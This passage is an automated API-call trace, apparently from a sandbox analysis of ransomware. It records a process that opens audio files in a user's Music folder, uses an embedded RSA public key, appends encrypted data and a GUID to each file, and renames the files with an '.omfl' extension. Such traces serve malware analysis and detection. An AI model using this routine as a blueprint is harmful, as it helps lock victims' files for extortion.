(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\j-Drys.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\j-drys.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.287] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=72098) returned 1 [0131.287] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.290] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x1197c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.290] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.291] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.291] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x119a2, lpOverlapped=0x0) returned 1 [0131.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.291] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.291] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.292] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.292] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.292] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.292] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.292] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.292] GetLastError () returned 0x0 [0131.292] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.292] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.293] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.293] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.293] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.293] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.293] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.293] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.294] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x119a2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.294] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.294] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.294] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.294] CloseHandle (hObject=0x5c8) returned 1 [0131.297] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.297] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0131.297] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\j-Drys.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\j-drys.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\j-Drys.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\j-drys.mp3.omfl")) returned 1 [0131.298] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b54e890, ftCreationTime.dwHighDateTime=0x1d5d8b6, ftLastAccessTime.dwLowDateTime=0xfad0c240, ftLastAccessTime.dwHighDateTime=0x1d5daa2, ftLastWriteTime.dwLowDateTime=0xfad0c240, ftLastWriteTime.dwHighDateTime=0x1d5daa2, nFileSizeHigh=0x0, nFileSizeLow=0x139aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K9iyCr3V5.mp3", cAlternateFileName="K9IYCR~1.MP3")) returned 1 [0131.299] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.299] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.299] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\K9iyCr3V5.mp3") returned=".mp3" [0131.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\K9iyCr3V5.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k9iycr3v5.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.299] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=80298) returned 1 [0131.299] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.302] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x13984, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.302] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.303] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.303] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x139aa, lpOverlapped=0x0) returned 1 [0131.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.304] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.304] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.305] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.305] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.305] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.305] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.305] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.305] GetLastError () returned 0x0 [0131.305] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.305] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.305] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.305] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.305] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.305] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.306] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.306] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.307] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x139aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.307] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.307] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.307] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.307] CloseHandle (hObject=0x5c8) returned 1 [0131.312] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.313] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0131.313] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\K9iyCr3V5.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k9iycr3v5.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\K9iyCr3V5.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k9iycr3v5.mp3.omfl")) returned 1 [0131.314] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21ffd130, ftCreationTime.dwHighDateTime=0x1d5e552, ftLastAccessTime.dwLowDateTime=0xfc9ecdb0, ftLastAccessTime.dwHighDateTime=0x1d5e475, ftLastWriteTime.dwLowDateTime=0xfc9ecdb0, ftLastWriteTime.dwHighDateTime=0x1d5e475, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m9aM4s.m4a", cAlternateFileName="")) returned 1 [0131.314] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.314] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.315] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m9aM4s.m4a") returned=".m4a" [0131.315] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m9aM4s.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m9am4s.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.315] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=82894) returned 1 [0131.315] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.318] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x143a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.318] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.319] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x143ce, lpOverlapped=0x0) returned 1 [0131.320] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.320] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.320] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.320] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.321] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.321] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.321] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.321] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.321] GetLastError () returned 0x0 [0131.321] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.321] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.321] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.321] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.321] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.322] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.322] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.323] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x143ce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.323] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.323] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.323] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.323] CloseHandle (hObject=0x5c8) returned 1 [0131.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0131.327] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m9aM4s.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m9am4s.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m9aM4s.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m9am4s.m4a.omfl")) returned 1 [0131.329] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x702a4340, ftCreationTime.dwHighDateTime=0x1d5e467, ftLastAccessTime.dwLowDateTime=0xe37d5bd0, ftLastAccessTime.dwHighDateTime=0x1d5e439, ftLastWriteTime.dwLowDateTime=0xe37d5bd0, ftLastWriteTime.dwHighDateTime=0x1d5e439, nFileSizeHigh=0x0, nFileSizeLow=0x11d94, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nXXZ9Lp7ZqJfxas0PNS.wav", cAlternateFileName="NXXZ9L~1.WAV")) returned 1 [0131.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.329] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nXXZ9Lp7ZqJfxas0PNS.wav") returned=".wav" [0131.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nXXZ9Lp7ZqJfxas0PNS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nxxz9lp7zqjfxas0pns.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.329] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=73108) returned 1 [0131.329] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.332] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x11d6e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.332] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.333] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.333] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x11d94, lpOverlapped=0x0) returned 1 [0131.334] lstrlenA (lpString="-----BEGIN PUBLIC 